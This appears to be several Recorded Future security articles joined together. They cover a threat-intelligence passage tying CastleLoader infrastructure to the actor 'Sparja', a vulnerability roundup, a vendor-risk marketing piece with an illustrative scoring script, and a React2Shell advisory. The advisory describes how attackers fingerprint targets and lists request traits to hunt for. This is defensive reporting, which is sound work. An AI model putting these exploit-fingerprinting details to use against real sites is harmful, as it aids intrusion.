Analysis of historical CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named “Sparja”. A panel hosted on 94[.]159[.]113[.]123 and exposed on port 5050 diverged from established CastleLoader panel characteristics. While known CastleLoader administrative interfaces typically display the HTML title “Castle,” this instance returned the title “Sparja.” Review of the panel’s DOM file revealed that it referenced a CSS file with a filename identical to one observed in verified CastleLoader panels. While the overlap does not constitute a conclusive stylistic correlation, it may suggest code reuse or reliance on a shared panel template between CastleLoader and the “Sparja” interface. Insikt Group identified one other Sparja panel with the same HTML title on the IP address 94[.]159[.]113[.]32 (see Figure 22).
Figure 22: Sparja panel (top) and CastleLoader panel (bottom) (Source: Recorded Future)
Activity associated with the alias “Sparja” on the underground Exploit Forum provides additional context for possible connections. Based on information obtained via proprietary means, Insikt Group assesses that Sparja is also active on the top-tier Russian-language forum XSS. Insikt Group bases this assessment on the user’s XSS activity, in which the user viewed similar topics related to malware loaders, EV certificates, and bypass software.
On December 22, 2024, Sparja authored a thread on Exploit Forum, looking to buy or rent a dropper (see Figure 23). In a documented dispute spanning from January to February 2025, Sparja engaged a user known as “ppro” to develop a “private solution, a dropper or loader for an executable file.” The dispute concluded with ppro’s ban from the forum, following a history of earlier account suspensions and reinstatements. Given the timeline of the events, Insikt Group assesses it is unlikely ppro had involvement in CastleLoader’s development; however, Sparja’s expressed interest in acquiring a custom loader prior to CastleLoader’s appearance supports the assessment that Sparja was actively pursuing dropper or loader functionality consistent with CastleLoader’s purpose.
Figure 23: Sparja in search of a dropper or loader on Exploit Forum (Source: Recorded Future)
Forum discussions in October 2025 indicate continued interest in Sparja’s apparent tooling (see Figure 24). A subsequent post sought contact with “the coder who wrote the Sparja dropper,” implying that a distinct dropper associated with Sparja had circulated within the underground market. This activity’s timeline aligns with CastleLoader operations and suggests that Sparja’s development or procurement of loader-type malware was known among peers during the same operational period.
Figure 24: Exploit Forum user “tomri99le” looking for the coder that worked with Sparja (Source: Recorded Future)
A related CastleLoader sample, distributed as an MSI installer, was identified in Bazaar Abuse data as originating from the GitHub account github[.]com/legend123451111. The same account appears in a Cisco Talos report describing a malware-as-a-service (MaaS) ecosystem leveraging GitHub for payload distribution, including malware families such as Amadey and Emmenhtal. Talos noted consistent naming conventions, repository structures, and file types across multiple associated GitHub accounts, with the earliest activity dated to January 2025. The report concluded that the operators of these accounts likely facilitated multi-tenant malware distribution rather than single-threat actor campaigns.
The available evidence does not confirm that Sparja directly participated in the MaaS network described by Talos; however, the CastleLoader sample that originated from github[.]com/legend1234561111, which contained the MSI installer, is linked to the Sparja-named CastleLoader panel, indicating a potential overlap between the GitHub-based distribution channel and infrastructure associated with Sparja. This connection suggests that Sparja may have either used an existing MaaS framework to distribute CastleLoader payloads or operated within the same delivery ecosystem.
On October 27, 2025, Sparja posted a comment on Exploit Forum within a thread advertising eDragon_x’s dropper service, stating that they had been using the service for several months and considered the dropper reliable. This post is notable as it reinforces Sparja’s continued interest in droppers and loaders, a recurring theme in their activity. The post also situates Sparja in proximity to eDragon_x, a threat actor operating within overlapping underground circles that include “tramp”, a known threat actor reportedly identified as Oleg Nefedov. Tramp is associated with a spamming network responsible for distributing Qbot (aka Qakbot) and is identified as the founder of the BlackBasta ransomware group. Tramp was also an affiliate for several ransomware operations, such as REvil and Conti; he also maintained close ties with Rhysida and Cactus.
While there is no direct evidence of collaboration between Sparja and tramp, the shared participation across related forums and service providers like eDragon_x suggests that Sparja operates within a network of threat actors closely associated with major ransomware distribution and loader development ecosystems.
Victimology
Insikt Group identified numerous suspected victim IP addresses communicating with the Tier 1 C2 infrastructure associated with CastleRAT. While the majority of these IP addresses appear to be geolocated in the United States, only a limited number of actual victims could be positively identified. Most victims remain unidentified and cannot be confirmed; however, Insikt Group assesses it is likely that at least some of them represent private individuals who became infected. It is important to note that, for the entities Insikt Group did identify, the infection may have occurred on individual machines within the victim organization's network, or on devices using the organization's Wi-Fi, rather than on the organization's managed systems directly. For instance, within the university context, it is likely that some victims are individual machines, such as those used by students, connected to the university's network.
Mitigations
Leverage the IoCs in Appendix H to investigate potential past or ongoing infections, both successful and attempted, and use the Recorded Future Intelligence Cloud to monitor for future IoCs associated with GrayBravo (formerly tracked as TAG-150), TAG-160, TAG-161, and other threat actors.
Monitor for validated infrastructure associated with the malware families discussed in this report, including CastleLoader, CastleRAT, Matanbuchus, and numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.
Leverage Sigma, YARA, and Snort rules provided in Appendices I, J, K, L, M, N, and O in your SIEM or endpoint detection and response (EDR) tools to detect the presence or execution of CastleLoader, CastleRAT, and Matanbuchus. Additionally, use other detection rules available in the Recorded Future Intelligence Cloud.
Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure. This can be achieved by employing specific queries and filtering the results based on your assets.
Use the Recorded Future Intelligence Cloud to monitor GrayBravo, TAG-160, TAG-161, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.
Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to you. For example, if you want to stay informed about activities related to specific personas such as Sparja, you can receive regular AI-generated updates on this threat actor’s activity on Exploit Forum.
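The mitigations above ask readers to feed the appendix indicators into detection and monitoring systems. As an added example (not code from the Insikt Group report), the Python below parses the flattened, defanged Domain / IP Address / First Seen layout the report's appendices use, refangs it, and matches constructed proxy log lines against it, downgrading IP-only hits that predate an indicator's first-seen date or that sit on an IP fronting many indicator domains (shared hosting). Every indicator value, the log line format and the confidence thresholds are constructed assumptions.

```python
import re
from dataclasses import dataclass
from datetime import date, datetime
from typing import Optional

IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")
LOG_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) host=(?P<host>\S+) dst=(?P<dst>\S+)$")

# Constructed placeholder indicators (not the report's IoCs) in the flattened
# Domain / IP Address / First Seen layout of the report's appendices, defanged
# with "[.]"; "Cloudflare" or "N/A" stands in for an unknown hosting IP.
RAW_APPENDIX = """\
Domain
IP Address
First Seen
c2-alpha[.]invalid
198[.]51[.]100[.]7
2025-10-09
c2-beta[.]invalid
Cloudflare
2025-09-22
lure-one[.]invalid
203[.]0[.]113[.]20
2025-07-01
lure-two[.]invalid
203[.]0[.]113[.]20
2025-07-01
lure-three[.]invalid
203[.]0[.]113[.]20
2025-07-02
stale-lure[.]invalid
N/A
N/A
(Source: Recorded Future)
"""

# Constructed proxy log lines (hypothetical "ts src= host= dst=" format).
SAMPLE_LOGS = """\
2025-10-12T09:14:03Z src=10.0.0.5 host=c2-alpha.invalid dst=198.51.100.7
2025-10-01T11:02:44Z src=10.0.0.6 host=cdn-front.example dst=198.51.100.7
2025-10-12T12:30:00Z src=10.0.0.7 host=c2-beta.invalid dst=104.16.0.1
2025-08-02T08:00:00Z src=10.0.0.8 host=unrelated.example dst=203.0.113.20
2025-10-12T13:00:00Z src=10.0.0.9 host=benign.example dst=192.0.2.1
"""

@dataclass(frozen=True)
class Indicator:
    domain: str
    ip: Optional[str]           # None for "N/A" or a CDN name such as Cloudflare
    first_seen: Optional[date]  # None for "N/A"

def refang(value: str) -> str:
    return value.replace("[.]", ".").replace("hxxp", "http")

def parse_appendix(text: str) -> list:
    """Parse the one-field-per-line appendix layout into Indicator records."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip() and not ln.startswith("(Source")]
    if lines[:3] == ["Domain", "IP Address", "First Seen"]:
        lines = lines[3:]          # drop the header row
    out = []
    for dom, ip, seen in zip(lines[0::3], lines[1::3], lines[2::3]):
        ip = refang(ip)
        out.append(Indicator(refang(dom).lower(),
                             ip if IPV4_RE.fullmatch(ip) else None,
                             date.fromisoformat(seen) if DATE_RE.fullmatch(seen) else None))
    return out

def match_logs(indicators, log_text: str, shared_ip_threshold: int = 3) -> list:
    """Return (line, indicator_domains, confidence, reason) tuples. A hostname hit
    is high confidence; an IP-only hit is low when it predates the indicator's
    first-seen date or the IP fronts many indicator domains, else medium."""
    domains = {i.domain for i in indicators}
    by_ip = {}
    for i in indicators:
        if i.ip:
            by_ip.setdefault(i.ip, []).append(i)
    matches = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        host = m["host"].lower()
        if host in domains:
            matches.append((line, host, "high", "hostname matches C2 indicator"))
            continue
        inds = by_ip.get(m["dst"])
        if not inds:
            continue
        ev_date = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").date()
        known = [i.first_seen for i in inds if i.first_seen]
        doms = ",".join(sorted(i.domain for i in inds))
        if known and ev_date < min(known):
            conf, why = "low", "traffic predates indicator first-seen; IP may have served another tenant"
        elif len(inds) >= shared_ip_threshold:
            conf, why = "low", f"IP fronts {len(inds)} indicator domains; likely shared hosting"
        else:
            conf, why = "medium", "destination IP matches indicator; no hostname context"
        matches.append((line, doms, conf, why))
    return matches

if __name__ == "__main__":
    for line, ind, conf, why in match_logs(parse_appendix(RAW_APPENDIX), SAMPLE_LOGS):
        print(f"[{conf:>6}] {ind}: {why}")
```

Real appendix text pasted into RAW_APPENDIX parses the same way; tables with a Last Seen column need a fourth field per row and a matching zip stride.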
Outlook
As anticipated in earlier assessments, GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware. This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective. Given GrayBravo’s established history of developing and deploying custom malware families, it is highly likely the group will continue to release new tools and capabilities in the near term, further strengthening its position within the MaaS market.
Among observed activity clusters, TAG-160 stands out for its highly targeted campaigns against the logistics sector. The cluster demonstrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. This indicates an increasing sophistication among niche, sector-specific threat actors who maintain a low profile through minimal footprints and precise targeting.
Insikt Group will continue to closely monitor GrayBravo along with related threat actors, such as TAG-160 and TAG-161, to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.
Appendix A: CastleLoader C2 Servers
Appendix B: Additional Infrastructure Likely Linked to CastleLoader
Appendix C: Logistics-Themed Infrastructure Used by TAG-160
Appendix D: Booking.com-Themed Domains Linked to TAG-161
Appendix E: Additional Infrastructure Linked to “Redirect and Email Manager” Tool
Appendix F: Steam Community Profiles and their Corresponding C2 Domains, alongside the IP Addresses that Hosted the C2 domains
November 2025 saw a significant 69% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 10 vulnerabilities requiring immediate attention, down from 32 in October.
What security teams need to know:
Fortinet leads concerns: Two critical FortiWeb vulnerabilities (CVE-2025-64446 and CVE-2025-58034) are under active exploitation
Public exploits proliferate: Seven of ten vulnerabilities have public proof-of-concept code available
OS Command Injection and Out-of-bounds Write were tied as the most common weakness types
Bottom line: The reduced volume shouldn't signal reduced vigilance. November's vulnerabilities demonstrate that threat actors favored quality over quantity in their exploitation campaigns.
Quick Reference: November 2025 Vulnerability Table
All 10 vulnerabilities below were actively exploited in November 2025.
Why this matters: Unauthenticated attackers can bypass authentication entirely and create administrative accounts. With 4,768 exposed FortiWeb instances globally, this represents a critical internet-facing risk.
Static vendor checks fall short: Traditional, point-in-time third-party risk management practices (e.g. annual questionnaires) leave organizations blind to emerging vendor threats between audits. Continuous monitoring is now a must.
Five common risk scenarios: Supply chain attacks, widespread software vulnerabilities, hidden fourth-party dependencies, vendor credential theft, and vendor instability each illustrate how “trusting” vendors can lead to breaches or business disruptions.
Intelligence-driven defense: Recorded Future’s platform provides real-time visibility into your vendor ecosystem—from dark web credential leaks to fourth-party relationships—enabling proactive mitigation before incidents impact your organization.
From trust to verification: The solution is to move from static trust to continuous verification. By continuously assessing vendors’ cyber and business health (and even integrating intelligence into workflows like ServiceNow), security leaders can vastly strengthen their vendor risk management framework.
Your Vendor Ecosystem Is a Black Box: It’s Time to Turn on the Lights
For CISOs and risk leaders, the attack surface now goes far beyond the footprint of the business. It’s a sprawling web of SaaS vendors, software suppliers, MSPs, payment processors, logistics partners, and niche fourth parties your vendors rely on. Every connection expands risk—often outside direct visibility. In other words, your security may only be as strong as your weakest vendor or partner.
Traditional third-party risk management (TPRM)—static security questionnaires and annual audits—cannot keep pace. They describe what a vendor claimed their security looked like months ago, not what it is right now. Meanwhile, the most damaging events (supply chain attacks, zero-day exploitation, credential resale, concentration failures) unfold in hours and days, not quarters.
This gap between point-in-time paperwork and real-time risk is why third-party exposure has become a primary vector for catastrophic breaches and business outages.
This article will highlight and analyze 5 real-world third-party risk examples. For each, we'll show why traditional methods fail and how continuous, real-time third-party risk management and threat intelligence are the only effective prevention.
5 Third-Party Risk Examples and How to Prevent Them
Modern vendor risk comes in many forms. Let’s explore five common scenarios—and how proactive measures can stop them:
Type 1: The Software Supply Chain Attack
The Scenario: One of the most damaging third-party risks is a software supply chain attack. This occurs when threat actors breach a trusted software vendor’s development environment and secretly inject malicious code into a legitimate, digitally signed software update. The tainted update, a “Trojan horse,” is then distributed to the vendor’s customers, giving the attacker access into thousands of networks at once.
Real-World Example: The SolarWinds Orion breach is a quintessential case. In 2020, nation-state hackers compromised SolarWinds’ build pipeline and inserted malware into an Orion software update. The malicious update, being validly signed, was pushed to around 18,000 customers, including numerous government agencies and Fortune 500 companies, who all gladly installed it, thereby granting the attackers insider access to their systems.
Why Traditional Methods Fail: A standard vendor security questionnaire or audit would never have caught this. SolarWinds had passed assessments and appeared reputable. The update itself was digitally signed and appeared “trusted” to antivirus scanners and other controls. In short, you cannot audit your way out of a risk that’s been inserted into a trusted product’s software supply chain.
The Intelligence-Led Solution: Preventing a supply chain attack means detecting subtle warning signs before the breach fully unfolds. Recorded Future’s platform continuously monitors for early indicators tied to your vendors. If threat actors known for targeting CI/CD pipelines start discussing or probing one of your software vendors, you’d know. If intelligence suggests a vendor’s code-signing certificate may be compromised, you’d get an alert. Armed with this foresight, you could elevate that vendor’s risk status, scrutinize their software updates more closely, and even hunt for indicators of compromise in your environment before the breach becomes public knowledge.
Type 2: The Widespread Third-Party Vulnerability
The Scenario: A critical software vulnerability (often a zero-day) is discovered in a common component that many of your vendors use. It could be an open-source library, a popular IT tool, or a cloud service. You have no direct visibility that your suppliers rely on this component. Attackers quickly develop an exploit and start compromising organizations at scale via this flaw, long before most victims even realize they’re exposed through their third parties.
Real-World Example: The MOVEit Transfer zero-day (exploited by the Cl0p ransomware group) and the Log4j “Log4Shell” vulnerability are perfect examples of this risk. In the case of MOVEit, a single bug in a widely used file-transfer product led to the mass theft of data from thousands of companies, many of whom weren’t even direct customers of MOVEit, but their vendors were. Similarly, the Log4j flaw impacted countless businesses indirectly because software used by their contractors and providers included the vulnerable library.
Why Traditional Methods Fail: This is fundamentally a technology visibility problem. A point-in-time survey asking your vendors “Do you use MOVEit?” is too little, too late. By the time you send out a questionnaire and get a reply (if you get one at all), attackers may have already exploited the vulnerability and exfiltrated data. No organization can manually track every piece of software in their extended vendor ecosystem through periodic check-ins. In the MOVEit incident, many companies had no idea they were at risk until news of data breaches surfaced. Traditional vendor risk management simply isn’t designed to monitor technical exposure in real time.
The Intelligence-Led Solution: Defending against widespread vulnerabilities requires connecting two dots instantly: what’s vulnerable and who in your supply chain is using it. This is where an intelligence platform shines. Recorded Future’s approach combines technical attack surface intelligence with real-time vulnerability tracking. It continuously scans the internet to map out the external-facing tech stack of your third parties. The moment a new critical vulnerability is disclosed, Recorded Future’s intelligence automatically checks which of your vendors are running that technology. You receive an immediate, prioritized alert such as: “CRITICAL: 15 of your third-party vendors are exposing servers running [the vulnerable software]. Prompt them to apply patches or mitigations immediately.”
Type 3: The Fourth-Party & Concentration Risk
The Scenario: Sometimes the biggest risk in your vendor ecosystem isn’t with your direct third parties, but with their key dependencies. A “fourth party” is a vendor of your vendor, and if one that many of your critical vendors rely on goes down, it can create a single point of failure. A single outage can cascade up the chain, disrupting operations even when direct vendors appear secure.
Real-World Example: The 2021 ransomware attack on Kaseya’s VSA remote monitoring and management platform is a textbook case. Kaseya primarily served managed service providers (MSPs), who in turn delivered IT services to thousands of downstream customers. When attackers exploited Kaseya VSA, they were effectively able to push ransomware out through those MSPs to many organizations that had no direct relationship with Kaseya at all—they only “knew” their MSP. A single fourth-party dependency became the pivot point for a broad, multi-industry disruption.
Why Traditional Methods Fail: If you looked at each of your primary (third-party) vendors in isolation, they all might have passed your security reviews with flying colors. What the traditional assessment missed was that ten of those vendors all relied on the same subcontractor for a critical function, a critical audit blind spot. Most organizations only discovered their exposure to Kaseya after MSP-delivered systems were already encrypted. Without continuous visibility into your vendors’ vendors, this kind of concentration risk remains invisible until it’s too late.
The Intelligence-Led Solution: The only way to manage fourth-party and concentration risk is through continuous mapping of your vendors’ vendors, coupled with dynamic risk scoring. Recorded Future’s Third-Party Intelligence solution automatically identifies and maps these Nth-party relationships throughout your supply chain. In practice, this means if a critical fourth-party suffers a breach, you won’t be finding out via the news days later. Instead, your intelligence dashboard would immediately show that entity’s risk score spiking from, say, a modest 50 to a critical 99. This timely insight gives you a head start to activate business continuity and incident response plans. You immediately know exactly which of your vendors are impacted and can work to contain the fallout.
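One way to make the fourth-party mapping and concentration scoring described above concrete (an added illustration, not Recorded Future's own scoring model): the Python below walks a constructed vendor dependency graph, scores each Nth party by the criticality of the direct vendors that transitively rely on it, and re-scores those vendors when the shared dependency suffers an incident, the Kaseya-style RMM-to-MSP-to-customer chain. Vendor names, criticality weights and the per-hop decay are hypothetical.

```python
from collections import defaultdict, deque

# Constructed dependency graph (hypothetical vendor names): each entity maps to
# the suppliers it relies on. Direct (third-party) vendors are listed in
# DIRECT_VENDORS with a criticality of 1-5; everything else is an Nth party.
DEPENDS_ON = {
    "PayrollCo":    ["CloudHostA", "MSP-North"],
    "CRM-SaaS":     ["CloudHostA", "AuthProvider"],
    "HelpdeskInc":  ["MSP-North"],
    "Logistics3PL": ["MSP-North", "TelematicsX"],
    "MSP-North":    ["RmmVendor"],   # the MSP manages clients through an RMM product
    "AuthProvider": ["CloudHostA"],
    "CloudHostA":   [],
    "TelematicsX":  [],
    "RmmVendor":    [],
}
DIRECT_VENDORS = {"PayrollCo": 5, "CRM-SaaS": 4, "HelpdeskInc": 2, "Logistics3PL": 3}

def transitive_suppliers(vendor, graph, _seen=None):
    """Every Nth-party supplier reachable from vendor (cycle-safe)."""
    seen = set() if _seen is None else _seen
    for dep in graph.get(vendor, []):
        if dep not in seen:
            seen.add(dep)
            transitive_suppliers(dep, graph, seen)
    return seen

def hops_to(vendor, target, graph):
    """Shortest supply-chain distance from vendor to target, or None."""
    queue, seen = deque([(vendor, 0)]), {vendor}
    while queue:
        node, dist = queue.popleft()
        if node == target:
            return dist
        for dep in graph.get(node, []):
            if dep not in seen:
                seen.add(dep)
                queue.append((dep, dist + 1))
    return None

def concentration(graph, direct):
    """Map each Nth party to the direct vendors (and criticalities) that depend
    on it, plus a concentration score = summed criticality of its dependents."""
    exposure = defaultdict(dict)
    for vendor, crit in direct.items():
        for dep in transitive_suppliers(vendor, graph):
            exposure[dep][vendor] = crit
    scores = {dep: sum(d.values()) for dep, d in exposure.items()}
    return dict(exposure), scores

def top_concentrations(scores, n=3):
    """Highest-scoring shared dependencies: the single points of failure."""
    return sorted(scores.items(), key=lambda kv: (-kv[1], kv[0]))[:n]

def impacted_by(entity, graph, direct):
    """Direct vendors whose supply chain contains the incident entity."""
    exposure, _ = concentration(graph, direct)
    return sorted(exposure.get(entity, {}))

def propagate_incident(entity, incident_score, graph, direct, base_scores, decay=10):
    """Re-score direct vendors after an Nth-party incident: each impacted vendor
    takes max(own score, incident score minus `decay` per hop beyond the first).
    The decay constant is an assumption for illustration, not a published model."""
    updated = dict(base_scores)
    for vendor in impacted_by(entity, graph, direct):
        hops = hops_to(vendor, entity, graph)
        updated[vendor] = max(base_scores.get(vendor, 0), incident_score - decay * (hops - 1))
    return updated

if __name__ == "__main__":
    _, scores = concentration(DEPENDS_ON, DIRECT_VENDORS)
    print("concentration:", top_concentrations(scores))
    baseline = {v: 50 for v in DIRECT_VENDORS}
    print("after RmmVendor incident:", propagate_incident("RmmVendor", 99, DEPENDS_ON, DIRECT_VENDORS, baseline))
```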
Type 4: The Vendor Credential Compromise
The Scenario: Not all third-party attacks involve sophisticated malware or supply chain tampering. Sometimes hackers just log in through the front door. In this scenario, a threat actor steals valid credentials from one of your vendors and uses those to access your systems. Perhaps an employee at a smaller, “low-risk” vendor, like an HVAC contractor, falls victim to a phishing email or unknowingly runs info-stealer malware on their laptop. Their VPN login or application credentials to your network get quietly harvested and sold on the dark web. An attacker buys the login, bypasses your multi-factor authentication, and walks into your network posing as a legitimate third-party user.
Real-World Example: This tactic was at the heart of the high-profile 2023 breaches of MGM Resorts and Caesars Entertainment, where attackers initially gained access via a third-party IT support vendor’s compromised VPN credentials.
Why Traditional Methods Fail: A vendor security questionnaire cannot prevent an individual at a partner company from clicking a phishing link or using a weak password. Your vendor might have all the right policies on paper, but those policies are irrelevant the moment an attacker has a valid username and password in hand. Traditional TPRM programs are about vetting a vendor’s security controls and compliance, but they don’t provide real-time awareness of things like a password leak or dark web sale of access related to that vendor.
The Intelligence-Led Solution: The key to stopping a credential-based breach is catching those compromised credentials before they are used against you. This calls for continuous identity-centric intelligence. Recorded Future’s Third-Party Intelligence module includes automated monitoring of a wide range of sources, from dark web forums to infostealer logs and criminal marketplaces, specifically watching for any mention of your organization’s partners and their accounts. The moment a set of credentials associated with one of your vendors appears in an illicit context, you receive a high-priority alert. Your team can immediately revoke or reset that vendor account and investigate the extent of access. This is the definition of proactive defense: you’re effectively shutting the door on the attacker before they can walk through it.
Type 5: The Operational & Financial Instability Risk
The Scenario: Sometimes the greatest third-party risk is a vendor’s operational or financial collapse. Consider a scenario where a critical vendor suddenly encounters a non-cyber crisis like bankruptcy, a major lawsuit or regulatory sanction, a natural disaster, or even a geopolitical event that halts their business. From your security team’s perspective everything looked fine, but virtually overnight this partner’s failure threatens to grind your business to a halt.
Real-World Example: A headline-grabbing case occurred with the sudden collapse of Silicon Valley Bank (SVB) in March 2023. SVB wasn’t attacked by hackers; it suffered a bank run and shut down in a matter of days. Companies that used SVB as a banking partner or for credit found themselves unable to access funds or process payroll, creating a cascade of operational and financial issues.
Why Traditional Methods Fail: A standard security questionnaire or compliance-focused vendor review is utterly blind to this category of risk. Your CISO’s third-party risk process likely doesn’t include reviewing a vendor’s financial statements or monitoring news about their executives’ legal troubles—nor should it, in a traditional model, since those are outside the classic IT security scope. As a result, organizations were caught off-guard by SVB’s collapse. A vendor that looked perfectly green from a security control standpoint turned out to be a huge business continuity threat. This kind of event exposes an “edge case” risk that isn’t an edge case at all: vendors can introduce strategic and financial risks that security teams and vendor managers often aren’t tracking.
The Intelligence-Led Solution: Truly comprehensive third-party risk management means monitoring all-source intelligence on your vendors, not just cyber indicators. Recorded Future’s Third-Party Intelligence platform is built to ingest and analyze a broad spectrum of data about companies. This includes real-time monitoring of global news media, credit ratings and financial filings, changes in executive leadership, legal filings, sanctions lists, regulatory watchlists, and more. By defining “risk” holistically, the platform can alert you to significant non-cyber events that may impact your vendors. These signals give your security, risk, and procurement teams time to react, whether that means activating contingency plans, finding alternate suppliers, or engaging leadership to address the issue.
The Solution: Move from “Trust” to “Continuous Verification”
The five examples share a theme: “trust” is not a control. Vendor attestations and annual audits don’t capture rapidly changing third-party conditions—exploits, credentials, dependencies, and financial shocks. To answer why third-party risk management is important: it’s no longer a “vendor” problem. It’s your attack surface, your data, and your reputation on the line.
This is why security leaders are shifting from a trust-but-verify model to a model of continuous verification, replacing blind trust with live intelligence.
Moving to continuous verification means supplementing or replacing periodic vendor check-ins with real-time intelligence and automation. This is where Recorded Future’s approach comes in. Recorded Future acts as a “risk radar” that’s always on, giving you a 360-degree, real-time view of your third-party ecosystem. It uniquely integrates multiple intelligence streams—threat intelligence, attack surface intelligence, and third-party risk intelligence—into one platform.
Know which CVEs matter today across your ecosystem with Vulnerability Intelligence and exploit-in-the-wild context.
Detect compromised vendor access with Identity Intelligence and automated revocation workflows.
Map fourth-party dependencies and track concentration with Third-Party Intelligence risk scoring.
Operationalize all of this via integrations to SIEM/SOAR/EDR and GRC/TPRM workflows (e.g., ServiceNow) so that risk evidence triggers action.
Recorded Future is the only platform connecting disparate, live third-party intelligence into a single, real-time view that answers the question:
“Which of my vendors poses the greatest risk to my business—right now?”
Ready to replace point-in-time vendor questionnaires with continuous verification? Schedule a personalized demo, and our experts will show you how the Recorded Future platform provides a complete, real-time picture of your vendor ecosystem.
FAQ
What is the first step in creating a third-party risk management (TPRM) program?
The first step is inventory and categorization. You can't protect what you don't know you have. This involves creating a comprehensive inventory of all your third-party vendors, suppliers, and partners and then categorizing them based on their access to sensitive data and their criticality to your operations (e.g., "high," "medium," "low" risk).
What is the difference between third-party and fourth-party risk?
Third-party risk is the risk posed by your direct vendors (e.g., your SaaS provider, your payroll company). Fourth-party risk (or Nth-party risk) is the risk posed by your vendor's vendors. For example, if your SaaS provider hosts its application on a major cloud platform, that cloud platform is your fourth-party. The risk is cascaded up the supply chain and is often invisible to you without the right intelligence.
How often should we assess our third-party vendors?
High-risk vendors (those with access to critical data or vital to operations) should be assessed at least annually and continuously monitored in real-time. Traditional, "point-in-time" assessments (like questionnaires) are no longer sufficient, as a vendor's security posture can change overnight.
How does Recorded Future help manage third-party risk more effectively?
Recorded Future's Third-Party Intelligence solution moves organizations beyond static, periodic assessments. It provides continuous, real-time intelligence by monitoring all your vendors for critical risk signals—like data breaches, malware infections, exposed credentials, attack surface vulnerabilities, and negative financial news—allowing you to prioritize and act on the most critical vendor risks before they become a breach.
How can I see risks from my vendors that are part of my own attack surface?
This is a critical connection. Recorded Future's Attack Surface Intelligence can be combined with Third-Party Intelligence to identify external-facing assets and vulnerabilities (e.g., services, open ports, vulnerable software) that belong to your third parties but are directly linked to your organization. This helps you understand exactly how a vendor's poor security hygiene directly exposes your own attack surface to an attacker.
Cyber and physical risks are converging. Online exposure now translates into real-world danger as doxxing, deepfakes, and business email compromise blur the boundary between the virtual and physical worlds.
Executives are prime targets. Their digital footprints, public visibility, and access to sensitive assets make them especially attractive to adversaries.
Threat intelligence can bridge the gap. Organizations are using social media monitoring, geopolitical analysis, and risk scoring to identify early indicators of harm against executives and employees.
Recorded Future enables proactive protection. By unifying physical and digital intelligence, security teams can detect threats earlier, contextualize risk, and safeguard leadership.
A critical vulnerability in React Server Components is allegedly being actively exploited by multiple Chinese threat actors; Recorded Future recommends that organizations patch their systems immediately.
What's Happening
CVE-2025-55182, dubbed "React2Shell," affects React Server Components versions 19.0, 19.1.0, 19.1.1, and 19.2.0 in several Meta packages. Amazon's AWS Threat Intelligence team reported on December 4 that Chinese threat groups including Earth Lamia, Jackpot Panda, and several untracked clusters are actively exploiting this vulnerability. However, AWS has not provided any further evidence for these attributions beyond IP addresses allegedly used by these threat groups. At this stage, Insikt Group cannot exclude the possibility that the same threat group might still be using the IP address 206[.]237[.]3[.]150, but we are currently unable to verify AWS’s attribution to Earth Lamia.
The vulnerability stems from unsafe payload deserialization at React Server Function endpoints. When successfully exploited, attackers can execute arbitrary code through crafted HTTP requests, potentially leading to complete backend compromise.
CVE-2025-55182 Intelligence Card c/o Recorded Future
There are now multiple publicly available exploit scripts (I forked one on GitHub here) for the React and Next.js vulnerabilities (CVE-2025-55182 and CVE-2025-66478).
The underlying issue is data serialization/deserialization, which evoked thoughts about a blog I wrote in 2016, addressing the same issue (at the time, the topic was CVE-2015-4852, a serialization flaw in Java objects that affected Oracle and Apache products).
Timeline illustrating the deserialization vulnerability impacts of 40+ critical CVEs across 6 ecosystems, over the course of 10 years.
2 Risk Takeaways
The exploit pattern repeats because serialization is a straightforward method for transferring data, and developers typically use what works. Coders use different languages and frameworks, yet the same class of vulnerability persists. The upstream opportunity here is for universities to aggressively drive security into all programming courses.
Everyone is a coder now, and security domain expertise has never been more important. Every business function will include AI-assisted coders, supercharging productivity and efficiency. LLMs don’t need to stop for human input, but understanding internet plumbing, tools, platforms, and security implications is now crucial. The most valuable employees can use AI for 10x+ impact AND catch potential issues as humans become the AI-copilots.
Technical Causation
Serialization is seductive: It’s the easy path for passing complex objects across trust boundaries (client ↔ server, service ↔ service). Developers reach for it because it “just works” (until it catastrophically doesn’t).
Framework abstraction hides the danger: Some percentage of Next.js developers using Server Actions are unaware that they’re invoking a custom serialization protocol. They’re calling a function. The risk is invisible until it’s exploited.
The ecosystem never learns collectively: Java shops learned (painfully) about gadget chains and ObjectInputStream. However, that institutional knowledge didn’t necessarily transfer to Node.js/React developers building RSC implementations a decade later.
The Threat
The attack surface has expanded once again. In 2015, we were tracking exploit chatter on Chinese forums appearing weeks before CVEs. Now, there are double-digit public GitHub repositories with weaponized exploit code within days of disclosure. Agentic workflows will soon compress that window down to minutes. The time-to-exploitation will amount to the time defenders spend reading about any new high-severity vulnerability.
PoC exploit testing, c/o Recorded Future
Defender Considerations for CVE-2025-55182 / CVE-2025-66478
Attackers differentiate vulnerable App Router targets from safe Pages Router sites by checking for window.__next_f vs __NEXT_DATA__. Your asset inventory should already know which flavor you’re running.
The vulnerability lives in the Flight protocol deserialization. If you're not using Server Actions, consider disabling them. If you are, requests that carry a Next-Action header (the Server Action endpoint) are where to focus WAF rules.
Hunt for anomalous POST requests carrying a Next-Action header whose multipart payloads reference __proto__ or contain unusually shaped serialized JSON structures. The exploit exfiltrates via base64 in error digests.
The core issue is in react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Custom RSC implementations outside Next.js are equally exposed.
